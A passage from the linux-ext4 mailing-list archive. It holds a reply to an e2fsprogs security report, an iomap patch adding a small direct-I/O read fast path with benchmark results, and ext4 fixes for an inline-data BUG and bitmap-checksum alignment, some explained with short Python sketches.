Linux EXT4 FS development
* Re: security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Andreas Dilger @ 2026-06-08  9:49 UTC
  To: Feng Xue; +Cc: tytso@mit.edu, linux-ext4@vger.kernel.org
In-Reply-To: <SY0P300MB0070F750CCF6F2C3A2A91FDE901F2@SY0P300MB0070.AUSP300.PROD.OUTLOOK.COM>

[-- Attachment #1: Type: text/plain, Size: 949 bytes --]

Hello Feng Xue,
Thank you for your report.  The inode blocks overflow looks legitimate and is trivial to fix.  The reproducer is a bit unusual: it is a Python script that generates a synthetic ext4 image directly, rather than an e2fsck test case like "f_64kblock" that uses mke2fs to create the filesystem with mostly appropriate parameters and debugfs to overwrite the values.

Then e2fsck can be run on the filesystem to fix the superblock s_blocks_per_group value.

A patch with the trivial code fix, including a test case, is attached for review.


The debugfs issue seems less important, since it requires the administrator to run a specific debugfs command on a specific file.

> On Jun 7, 2026, at 07:34, Feng Xue <feng.xue@outlook.com> wrote:
> 
> Hi there,
> 
> I'd like to report two potential security bugs for your review.
> detailed report and pocs attached.
> 
> Best,
> Feng


Cheers, Andreas


[-- Attachment #2: 0001-libext2fs-fix-inode_blocks-overflow-in-ext2fs_open.patch --]
[-- Type: application/octet-stream, Size: 6294 bytes --]


* [PATCH v4] iomap: add simple read path for small direct I/O
From: Fengnan Chang @ 2026-06-08  7:31 UTC
  To: brauner, djwong, hch, ojaswin, dgc, linux-xfs, linux-fsdevel,
	linux-ext4, linux-kernel, lidiangang
  Cc: Fengnan Chang

When running 4K random read workloads on high-performance Gen5 NVMe
SSDs, the software overhead in the iomap direct I/O path
(__iomap_dio_rw) becomes a significant bottleneck.

Using io_uring with poll mode for a 4K randread test on a raw block
device:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /dev/nvme10n1
Result: ~3.2M IOPS

Running the exact same workload on ext4 and XFS:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /mnt/testfile
Result: ~1.92M IOPS

Profiling the ext4 workload reveals that a significant portion of CPU
time is spent on memory allocation and the iomap state machine
iteration:
  5.33%  [kernel]  [k] __iomap_dio_rw
  3.26%  [kernel]  [k] iomap_iter
  2.37%  [kernel]  [k] iomap_dio_bio_iter
  2.35%  [kernel]  [k] kfree
  1.33%  [kernel]  [k] iomap_dio_complete

Introduce a simple read path to reduce the overhead of iomap. The simple
read path is triggered when the request satisfies:
- I/O size is <= inode blocksize (fits in a single block, no splits).
- No custom `iomap_dio_ops` (dops) registered by the filesystem.
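
As a rough illustration, the two conditions above can be combined with the extra checks that iomap_dio_rw() and iomap_dio_simple_read_supported() apply in the diff further down into a single predicate. This is only a sketch in Python: the Request class, the function name, and the flag bit values are hypothetical stand-ins, not kernel definitions.

```python
from dataclasses import dataclass

# Illustrative flag bits only; the real values live in the kernel headers.
IOMAP_DIO_FORCE_WAIT = 1 << 0
IOMAP_DIO_PARTIAL = 1 << 2


@dataclass
class Request:
    """Hypothetical model of the inputs the eligibility check looks at."""
    is_read: bool
    pos: int
    count: int
    dio_flags: int = 0
    has_dops: bool = False
    done_before: int = 0


def simple_read_supported(req, blocksize, i_size):
    """Return True if the request may attempt the simple read path."""
    if req.has_dops or req.done_before:
        return False                      # caller needs the generic path
    if not req.is_read or req.count == 0:
        return False                      # only non-empty reads qualify
    if req.count > blocksize:
        return False                      # must fit in a single block
    if req.dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL):
        return False
    if req.pos + req.count > i_size:
        return False                      # must not read past EOF
    return True


print(simple_read_supported(Request(True, 0, 4096), 4096, 1 << 20))
print(simple_read_supported(Request(True, 0, 8192), 4096, 1 << 20))
```

Even when this predicate passes, the patch can still fall back to the generic path later (for example when the mapping is not a single IOMAP_MAPPED extent), so the check is necessary but not sufficient.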

After this optimization, the heavy generic functions disappear from the
profile, replaced by a single streamlined execution path:
  4.83%  [kernel]  [k] iomap_dio_simple_read

With this patch, 4K random read IOPS on ext4 increases from 1.92M to
2.19M in the original single-core io_uring poll-mode workload.

Below are the test results using fio:

fs    workload       qd    simple=0      simple=1      gain
ext4  libaio         1     18,768        18,796        +0.15%
ext4  libaio         64    462,459       479,435       +3.67%
ext4  libaio         128   462,427       478,411       +3.46%
ext4  libaio         256   461,579       477,561       +3.46%
ext4  io_uring       1     18,898        18,914        +0.08%
ext4  io_uring       64    564,405       590,145       +4.56%
ext4  io_uring       128   563,322       592,365       +5.16%
ext4  io_uring       256   562,281       590,593       +5.04%
ext4  io_uring_poll  1     19,292        19,271        -0.11%
ext4  io_uring_poll  64    994,612       1,006,334     +1.18%
ext4  io_uring_poll  128   1,421,945     1,518,535     +6.79%
ext4  io_uring_poll  256   1,576,507     1,772,901     +12.46%
xfs   libaio         1     18,778        18,781        +0.01%
xfs   libaio         64    459,617       476,411       +3.65%
xfs   libaio         128   461,642       477,571       +3.45%
xfs   libaio         256   459,828       475,224       +3.35%
xfs   io_uring       1     18,898        18,923        +0.13%
xfs   io_uring       64    557,195       583,320       +4.69%
xfs   io_uring       128   560,109       585,549       +4.54%
xfs   io_uring       256   559,117       581,846       +4.07%
xfs   io_uring_poll  1     19,257        19,301        +0.23%
xfs   io_uring_poll  64    983,827       998,497       +1.49%
xfs   io_uring_poll  128   1,389,644     1,489,604     +7.19%
xfs   io_uring_poll  256   1,523,554     1,702,827     +11.77%
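
The gain column appears to be the relative change from the simple=0 column to the simple=1 column. A minimal sketch that recomputes it for three rows copied from the table (the helper name gain_percent is an assumption made for illustration):

```python
def gain_percent(before, after):
    """Relative change from `before` to `after`, in percent."""
    return (after - before) / before * 100.0


# (fs, workload, qd) -> (simple=0, simple=1), copied from the table above.
rows = {
    ("ext4", "io_uring_poll", 256): (1_576_507, 1_772_901),
    ("xfs", "io_uring_poll", 256): (1_523_554, 1_702_827),
    ("ext4", "io_uring_poll", 1): (19_292, 19_271),
}

for key, (before, after) in rows.items():
    print(key, f"{gain_percent(before, after):+.2f}%")
```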

v4:
fix fserror report and update test data based on v7.1-rc3.

v3:
Test data updated based on v7.1-rc3.

Signed-off-by: Fengnan Chang <changfengnan@bytedance.com>
---
 fs/iomap/direct-io.c | 390 +++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 376 insertions(+), 14 deletions(-)

diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
index b36ee619cdcdd..3cb179752612e 100644
--- a/fs/iomap/direct-io.c
+++ b/fs/iomap/direct-io.c
@@ -10,6 +10,9 @@
 #include <linux/iomap.h>
 #include <linux/task_io_accounting_ops.h>
 #include <linux/fserror.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/init.h>
 #include "internal.h"
 #include "trace.h"
 
@@ -88,9 +91,9 @@ static inline enum fserror_type iomap_dio_err_type(const struct iomap_dio *dio)
 	return FSERR_DIRECTIO_READ;
 }
 
-static inline bool should_report_dio_fserror(const struct iomap_dio *dio)
+static inline bool should_report_dio_fserror(int error)
 {
-	switch (dio->error) {
+	switch (error) {
 	case 0:
 	case -EAGAIN:
 	case -ENOTBLK:
@@ -110,7 +113,7 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
 
 	if (dops && dops->end_io)
 		ret = dops->end_io(iocb, dio->size, ret, dio->flags);
-	if (should_report_dio_fserror(dio))
+	if (should_report_dio_fserror(dio->error))
 		fserror_report_io(file_inode(iocb->ki_filp),
 				  iomap_dio_err_type(dio), offset, dio->size,
 				  dio->error, GFP_NOFS);
@@ -237,23 +240,29 @@ static void iomap_dio_done(struct iomap_dio *dio)
 	iomap_dio_complete_work(&dio->aio.work);
 }
 
-static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+static inline void iomap_dio_bio_release_pages(struct bio *bio,
+		unsigned int dio_flags, bool error)
 {
-	struct iomap_dio *dio = bio->bi_private;
-
 	if (bio_integrity(bio))
 		fs_bio_integrity_free(bio);
 
-	if (dio->flags & IOMAP_DIO_BOUNCE) {
-		bio_iov_iter_unbounce(bio, !!dio->error,
-				dio->flags & IOMAP_DIO_USER_BACKED);
+	if (dio_flags & IOMAP_DIO_BOUNCE) {
+		bio_iov_iter_unbounce(bio, error,
+				dio_flags & IOMAP_DIO_USER_BACKED);
 		bio_put(bio);
-	} else if (dio->flags & IOMAP_DIO_USER_BACKED) {
+	} else if (dio_flags & IOMAP_DIO_USER_BACKED) {
 		bio_check_pages_dirty(bio);
 	} else {
 		bio_release_pages(bio, false);
 		bio_put(bio);
 	}
+}
+
+static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+{
+	struct iomap_dio *dio = bio->bi_private;
+
+	iomap_dio_bio_release_pages(bio, dio->flags, !!dio->error);
 
 	/* Do not touch bio below, we just gave up our reference. */
 
@@ -398,6 +407,14 @@ static ssize_t iomap_dio_bio_iter_one(struct iomap_iter *iter,
 	return ret;
 }
 
+static inline unsigned int iomap_dio_alignment(struct inode *inode,
+		struct block_device *bdev, unsigned int dio_flags)
+{
+	if (dio_flags & IOMAP_DIO_FSBLOCK_ALIGNED)
+		return i_blocksize(inode);
+	return bdev_logical_block_size(bdev);
+}
+
 static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 {
 	const struct iomap *iomap = &iter->iomap;
@@ -416,10 +433,7 @@ static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 	 * File systems that write out of place and always allocate new blocks
 	 * need each bio to be block aligned as that's the unit of allocation.
 	 */
-	if (dio->flags & IOMAP_DIO_FSBLOCK_ALIGNED)
-		alignment = fs_block_size;
-	else
-		alignment = bdev_logical_block_size(iomap->bdev);
+	alignment = iomap_dio_alignment(inode, iomap->bdev, dio->flags);
 
 	if ((pos | length) & (alignment - 1))
 		return -EINVAL;
@@ -891,12 +905,352 @@ __iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 }
 EXPORT_SYMBOL_GPL(__iomap_dio_rw);
 
+struct iomap_dio_simple_read {
+	struct kiocb		*iocb;
+	size_t			size;
+	unsigned int		dio_flags;
+	atomic_t		state;
+	union {
+		struct task_struct	*waiter;
+		struct work_struct	work;
+	};
+	/*
+	 * Align @bio to a cacheline boundary so that, combined with the
+	 * front_pad passed to bioset_init(), the bio sits at the start of
+	 * a cacheline in memory returned by the (HWCACHE-aligned) bio
+	 * slab.  This keeps the hot fields block layer touches on submit
+	 * and completion (bi_iter, bi_status, ...) within a single line.
+	 */
+	struct bio	bio ____cacheline_aligned_in_smp;
+};
+
+static struct bio_set iomap_dio_simple_read_pool;
+
+/*
+ * In the async simple read path, we need to prevent bio_endio() from
+ * triggering iocb->ki_complete() before the submitter has returned
+ * -EIOCBQUEUED. Otherwise, the caller might free the iocb concurrently.
+ *
+ * We use a three-state rendezvous to synchronize the submitter and end_io:
+ *
+ * IOMAP_DIO_SIMPLE_SUBMITTING: Initial state set before submitting the bio.
+ *
+ * IOMAP_DIO_SIMPLE_QUEUED: The submitter has safely queued the IO and will
+ * return -EIOCBQUEUED. If end_io sees this state, it takes over and calls
+ * ki_complete().
+ *
+ * IOMAP_DIO_SIMPLE_DONE: end_io fired before the submitter finished the
+ * submit path. end_io sets this state and does nothing else. The submitter
+ * will see this state and handle the completion synchronously (bypassing
+ * ki_complete() and returning the actual result).
+ */
+enum {
+	IOMAP_DIO_SIMPLE_SUBMITTING = 0,
+	IOMAP_DIO_SIMPLE_QUEUED,
+	IOMAP_DIO_SIMPLE_DONE,
+};
+
+static ssize_t iomap_dio_simple_read_finish(struct kiocb *iocb,
+		struct bio *bio, ssize_t ret)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (likely(!ret)) {
+		ret = sr->size;
+		iocb->ki_pos += ret;
+	} else if (should_report_dio_fserror(ret)) {
+		fserror_report_io(inode, FSERR_DIRECTIO_READ, iocb->ki_pos,
+				  sr->size, ret, GFP_NOFS);
+	}
+
+	iomap_dio_bio_release_pages(bio, sr->dio_flags, ret < 0);
+
+	return ret;
+}
+
+static ssize_t iomap_dio_simple_read_complete(struct kiocb *iocb,
+		struct bio *bio)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	ssize_t ret;
+
+	WRITE_ONCE(iocb->private, NULL);
+
+	ret = iomap_dio_simple_read_finish(iocb, bio,
+			blk_status_to_errno(bio->bi_status));
+
+	inode_dio_end(inode);
+	trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0, ret > 0 ? ret : 0);
+	return ret;
+}
+
+static void iomap_dio_simple_read_complete_work(struct work_struct *work)
+{
+	struct iomap_dio_simple_read *sr =
+		container_of(work, struct iomap_dio_simple_read, work);
+	struct kiocb *iocb = sr->iocb;
+	ssize_t ret;
+
+	ret = iomap_dio_simple_read_complete(iocb, &sr->bio);
+	iocb->ki_complete(iocb, ret);
+}
+
+static void iomap_dio_simple_read_async_done(struct iomap_dio_simple_read *sr)
+{
+	struct kiocb *iocb = sr->iocb;
+
+	if (unlikely(sr->bio.bi_status)) {
+		struct inode *inode = file_inode(iocb->ki_filp);
+
+		INIT_WORK(&sr->work, iomap_dio_simple_read_complete_work);
+		queue_work(inode->i_sb->s_dio_done_wq, &sr->work);
+		return;
+	}
+
+	iomap_dio_simple_read_complete_work(&sr->work);
+}
+
+static void iomap_dio_simple_read_end_io(struct bio *bio)
+{
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (sr->waiter) {
+		struct task_struct *waiter = sr->waiter;
+
+		WRITE_ONCE(sr->waiter, NULL);
+		blk_wake_io_task(waiter);
+		return;
+	}
+
+	if (likely(atomic_read(&sr->state) == IOMAP_DIO_SIMPLE_QUEUED) ||
+	    atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+			   IOMAP_DIO_SIMPLE_DONE) == IOMAP_DIO_SIMPLE_QUEUED)
+		iomap_dio_simple_read_async_done(sr);
+}
+
+static inline bool iomap_dio_simple_read_supported(struct kiocb *iocb,
+		struct iov_iter *iter, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+
+	if (iov_iter_rw(iter) != READ)
+		return false;
+	if (!count)
+		return false;
+	/*
+	 * Simple read is an optimization for small IO. Filter out large IO
+	 * early as it's the most common case to fail for typical direct IO
+	 * workloads.
+	 */
+	if (count > inode->i_sb->s_blocksize)
+		return false;
+	if (dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL))
+		return false;
+	if (iocb->ki_pos + count > i_size_read(inode))
+		return false;
+
+	return true;
+}
+
+static ssize_t iomap_dio_simple_read(struct kiocb *iocb,
+		struct iov_iter *iter, const struct iomap_ops *ops,
+		void *private, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+	int nr_pages;
+	struct iomap_dio_simple_read *sr;
+	unsigned int alignment;
+	struct iomap_iter iomi = {
+		.inode		= inode,
+		.pos		= iocb->ki_pos,
+		.len		= count,
+		.flags		= IOMAP_DIRECT,
+		.private	= private,
+	};
+	struct bio *bio;
+	bool wait_for_completion = is_sync_kiocb(iocb);
+	ssize_t ret;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		nr_pages = bio_iov_bounce_nr_vecs(iter, REQ_OP_READ);
+	else
+		nr_pages = bio_iov_vecs_to_alloc(iter, BIO_MAX_VECS);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		iomi.flags |= IOMAP_NOWAIT;
+
+	ret = kiocb_write_and_wait(iocb, count);
+	if (ret)
+		return ret;
+
+	inode_dio_begin(inode);
+
+	ret = ops->iomap_begin(inode, iomi.pos, count, iomi.flags,
+			       &iomi.iomap, &iomi.srcmap);
+	if (ret) {
+		inode_dio_end(inode);
+		return ret;
+	}
+
+	if (iomi.iomap.type != IOMAP_MAPPED ||
+	    iomi.iomap.offset > iomi.pos ||
+	    iomi.iomap.offset + iomi.iomap.length < iomi.pos + count ||
+	    (iomi.iomap.flags & IOMAP_F_INTEGRITY)) {
+		ret = -ENOTBLK;
+		goto out_iomap_end;
+	}
+
+	alignment = iomap_dio_alignment(inode, iomi.iomap.bdev, dio_flags);
+	if ((iomi.pos | count) & (alignment - 1)) {
+		ret = -EINVAL;
+		goto out_iomap_end;
+	}
+
+	if (!wait_for_completion && unlikely(!inode->i_sb->s_dio_done_wq)) {
+		ret = sb_init_dio_done_wq(inode->i_sb);
+		if (ret < 0)
+			goto out_iomap_end;
+	}
+
+	trace_iomap_dio_rw_begin(iocb, iter, dio_flags, 0);
+
+	if (user_backed_iter(iter))
+		dio_flags |= IOMAP_DIO_USER_BACKED;
+
+	bio = bio_alloc_bioset(iomi.iomap.bdev, nr_pages,
+			       REQ_OP_READ | REQ_SYNC | REQ_IDLE,
+			       GFP_KERNEL, &iomap_dio_simple_read_pool);
+	sr = container_of(bio, struct iomap_dio_simple_read, bio);
+
+	fscrypt_set_bio_crypt_ctx(bio, inode, iomi.pos, GFP_KERNEL);
+	sr->iocb = iocb;
+	sr->dio_flags = dio_flags;
+
+	bio->bi_iter.bi_sector = iomap_sector(&iomi.iomap, iomi.pos);
+	bio->bi_ioprio = iocb->ki_ioprio;
+	bio->bi_private = sr;
+	bio->bi_end_io = iomap_dio_simple_read_end_io;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		ret = bio_iov_iter_bounce(bio, iter, count);
+	else
+		ret = bio_iov_iter_get_pages(bio, iter, alignment - 1);
+	if (unlikely(ret))
+		goto out_bio_put;
+
+	if (bio->bi_iter.bi_size != count) {
+		iov_iter_revert(iter, bio->bi_iter.bi_size);
+		ret = -ENOTBLK;
+		goto out_bio_release_pages;
+	}
+
+	sr->size = bio->bi_iter.bi_size;
+
+	if ((dio_flags & IOMAP_DIO_USER_BACKED) &&
+	    !(dio_flags & IOMAP_DIO_BOUNCE))
+		bio_set_pages_dirty(bio);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		bio->bi_opf |= REQ_NOWAIT;
+	if ((iocb->ki_flags & IOCB_HIPRI) && !wait_for_completion) {
+		bio->bi_opf |= REQ_POLLED;
+		bio_set_polled(bio, iocb);
+		WRITE_ONCE(iocb->private, bio);
+	}
+
+	if (wait_for_completion) {
+		sr->waiter = current;
+		blk_crypto_submit_bio(bio);
+	} else {
+		atomic_set(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING);
+		sr->waiter = NULL;
+		blk_crypto_submit_bio(bio);
+		ret = -EIOCBQUEUED;
+	}
+
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, count, iomi.flags,
+			       &iomi.iomap);
+
+	if (wait_for_completion) {
+		for (;;) {
+			set_current_state(TASK_UNINTERRUPTIBLE);
+			if (!READ_ONCE(sr->waiter))
+				break;
+			blk_io_schedule();
+		}
+		__set_current_state(TASK_RUNNING);
+
+		ret = iomap_dio_simple_read_finish(iocb, bio,
+				blk_status_to_errno(bio->bi_status));
+		inode_dio_end(inode);
+		trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0,
+					 ret > 0 ? ret : 0);
+	} else if (atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+				  IOMAP_DIO_SIMPLE_QUEUED) ==
+		   IOMAP_DIO_SIMPLE_DONE) {
+		ret = iomap_dio_simple_read_complete(iocb, bio);
+	} else {
+		trace_iomap_dio_rw_queued(inode, iomi.pos, count);
+	}
+
+	return ret;
+
+out_bio_release_pages:
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		bio_iov_iter_unbounce(bio, true, false);
+	else
+		bio_release_pages(bio, false);
+out_bio_put:
+	bio_put(bio);
+out_iomap_end:
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, 0, iomi.flags,
+			       &iomi.iomap);
+	inode_dio_end(inode);
+	return ret;
+}
+
 ssize_t
 iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 		const struct iomap_ops *ops, const struct iomap_dio_ops *dops,
 		unsigned int dio_flags, void *private, size_t done_before)
 {
 	struct iomap_dio *dio;
+	ssize_t ret;
+
+	/*
+	 * Fast path for small, block-aligned reads that map to a single
+	 * contiguous on-disk extent.
+	 *
+	 * @dops must be NULL: a non-NULL @dops means the caller wants its
+	 * ->end_io / ->submit_io hooks invoked, and in particular wants its
+	 * bios to be allocated from the filesystem-private @dops->bio_set
+	 * (whose front_pad sizes a filesystem-private wrapper around the
+	 * bio).  The fast path instead allocates from the shared
+	 * iomap_dio_simple_read_pool, whose front_pad matches
+	 * struct iomap_dio_simple_read; the two wrappers are not
+	 * interchangeable, so we must fall back to __iomap_dio_rw() in
+	 * that case.
+	 *
+	 * @done_before must be zero: a non-zero caller-accumulated residual
+	 * cannot be carried through a single-bio inline completion.
+	 *
+	 * -ENOTBLK is the private sentinel returned by iomap_dio_simple_read()
+	 * when it decides the request does not fit the fast path.
+	 * In that case we proceed to the generic __iomap_dio_rw() slow
+	 * path.  Any other errno is a real result and is propagated as-is,
+	 * in particular -EAGAIN for IOCB_NOWAIT must reach the caller.
+	 */
+	if (!dops && !done_before &&
+	    iomap_dio_simple_read_supported(iocb, iter, dio_flags)) {
+		ret = iomap_dio_simple_read(iocb, iter, ops, private, dio_flags);
+		if (ret != -ENOTBLK)
+			return ret;
+	}
 
 	dio = __iomap_dio_rw(iocb, iter, ops, dops, dio_flags, private,
 			     done_before);
@@ -905,3 +1259,11 @@ iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 	return iomap_dio_complete(dio);
 }
 EXPORT_SYMBOL_GPL(iomap_dio_rw);
+
+static int __init iomap_dio_init(void)
+{
+	return bioset_init(&iomap_dio_simple_read_pool, 4,
+			   offsetof(struct iomap_dio_simple_read, bio),
+			   BIOSET_NEED_BVECS | BIOSET_PERCPU_CACHE);
+}
+fs_initcall(iomap_dio_init);
-- 
2.39.5 (Apple Git-154)
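
The three-state rendezvous described in the patch's comment block can be modeled outside the kernel. The sketch below is a simplified Python model, not the kernel code: AtomicState is a hypothetical lock-based stand-in for atomic_t, and the two functions only report which side ends up responsible for completing the I/O.

```python
import threading

SUBMITTING, QUEUED, DONE = 0, 1, 2


class AtomicState:
    """Stand-in for atomic_t; cmpxchg() returns the old value."""

    def __init__(self, value):
        self._value = value
        self._lock = threading.Lock()

    def read(self):
        with self._lock:
            return self._value

    def cmpxchg(self, expected, new):
        with self._lock:
            old = self._value
            if old == expected:
                self._value = new
            return old


def end_io(state):
    """Completion side: True if end_io must call ki_complete() itself."""
    if state.read() == QUEUED:
        return True
    # Either we move SUBMITTING -> DONE (submitter completes later),
    # or the submitter raced us to QUEUED and we take over.
    return state.cmpxchg(SUBMITTING, DONE) == QUEUED


def submitter_finish(state):
    """Submit side: True if the submitter must complete synchronously."""
    return state.cmpxchg(SUBMITTING, QUEUED) == DONE


# Ordering 1: the bio completes before the submitter finishes.
s = AtomicState(SUBMITTING)
print(end_io(s), submitter_finish(s))

# Ordering 2: the submitter finishes first, then the bio completes.
s = AtomicState(SUBMITTING)
print(submitter_finish(s), end_io(s))
```

In both orderings exactly one side reports that it owns the completion, which is the property the comment in the patch relies on.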


* [PATCH] ext4: fix kernel BUG in ext4_write_inline_data_end
From: Aditya Prakash Srivastava @ 2026-06-08  6:52 UTC
  To: Theodore Ts'o, Andreas Dilger
  Cc: Jan Kara, Baokun Li, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
	linux-ext4, linux-kernel, Aditya Prakash Srivastava,
	syzbot+0c89d865531d053abb2d

When the data=journal mount option is used, the ext4_journalled_write_end()
function incorrectly calls ext4_write_inline_data_end() without checking
if the EXT4_STATE_MAY_INLINE_DATA flag is still set on the inode.

If a previous attempt to convert the inline data to an extent failed (e.g.
due to ENOSPC), the EXT4_STATE_MAY_INLINE_DATA flag is cleared, but
the EXT4_INODE_INLINE_DATA flag remains set. In this scenario, the next
call to ext4_write_begin() will not prepare the inline data xattr for
writing, but ext4_journalled_write_end() will incorrectly attempt to write
to it, triggering a BUG_ON(pos + len > EXT4_I(inode)->i_inline_size) in
ext4_write_inline_data() since i_inline_size was not expanded.

Fix this by ensuring that ext4_journalled_write_end() only calls
ext4_write_inline_data_end() if the EXT4_STATE_MAY_INLINE_DATA flag is
set, mirroring the behavior of ext4_write_end() and ext4_da_write_end().

Reported-by: syzbot+0c89d865531d053abb2d@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=0c89d865531d053abb2d
Fixes: 3fdcfb668fd7 ("ext4: add journalled write support for inline data")
Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
---
 fs/ext4/inode.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index c2c2d6ac7f3d..4fce9ec176f8 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -1560,7 +1560,8 @@ static int ext4_journalled_write_end(const struct kiocb *iocb,
 
 	BUG_ON(!ext4_handle_valid(handle));
 
-	if (ext4_has_inline_data(inode))
+	if (ext4_has_inline_data(inode) &&
+	    ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
 		return ext4_write_inline_data_end(inode, pos, len, copied,
 						  folio);
 
-- 
2.47.3



* [PATCH] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08  6:11 UTC
  To: linux-ext4
  Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
	Sashiko

The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().

If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum.  Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.

Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.
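
To make the arithmetic concrete, here is a small Python sketch of how a byte-granular checksum length leaves trailing bits uncovered when the per-group count is not a multiple of 8. The function names are hypothetical and the sample values are only examples, not taken from a real filesystem.

```python
def csum_coverage(bits_per_group):
    """Return (bytes_checksummed, trailing_bits_left_out) for a bitmap."""
    nbytes = bits_per_group >> 3      # same as bits_per_group // 8
    uncovered = bits_per_group & 7    # bits past the last whole byte
    return nbytes, uncovered


def is_8_aligned(bits_per_group):
    """Mirror of the '& 7' test the patch adds at mount time."""
    return (bits_per_group & 7) == 0


for n in (8192, 8190):
    nbytes, uncovered = csum_coverage(n)
    print(n, nbytes, uncovered, is_8_aligned(n))
```

For 8192 bits the checksum covers 1024 bytes and nothing is left out. For 8190 bits it covers 1023 bytes and the last 6 bits fall outside the checksummed range.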

Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
 fs/ext4/super.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3daf4cdcf07e 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
 		sbi->s_cluster_bits = 0;
 	}
 	sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
-	if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+	if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_clusters_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
 			 sbi->s_clusters_per_group);
 		return -EINVAL;
 	}
@@ -5304,7 +5305,8 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
 		return -EINVAL;
 	}
 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
-	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+	    sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_inodes_per_group & 7) {
 		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
 			 sbi->s_inodes_per_group);
 		return -EINVAL;
-- 
2.43.7



* Re: [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Baokun Li @ 2026-06-08  2:25 UTC
  To: Peng Wang
  Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, yi.zhang,
	linux-ext4, linux-kernel
In-Reply-To: <20260607124935.6168-1-peng_wang@linux.alibaba.com>

On 2026/6/7 20:49, Peng Wang wrote:
> ext4_overwrite_io() decides whether a direct I/O write is an overwrite
> (all target blocks already allocated) so the write can proceed under a
> shared inode lock.  It calls ext4_map_blocks() once and returns false
> if the mapped length is shorter than the requested length.
>
> ext4_map_blocks() maps at most one extent per call.  When a write
> straddles two extents (e.g. a written extent and an adjacent unwritten
> extent created by fallocate), the single call returns only the first
> extent's length.  ext4_overwrite_io() then mis-classifies the write as
> non-overwrite and forces the caller to cycle i_rwsem from shared to
> exclusive.

For the aligned case, the overwrite check can now be skipped entirely.

For non-aligned cases, you can optimistically hold the read lock and then
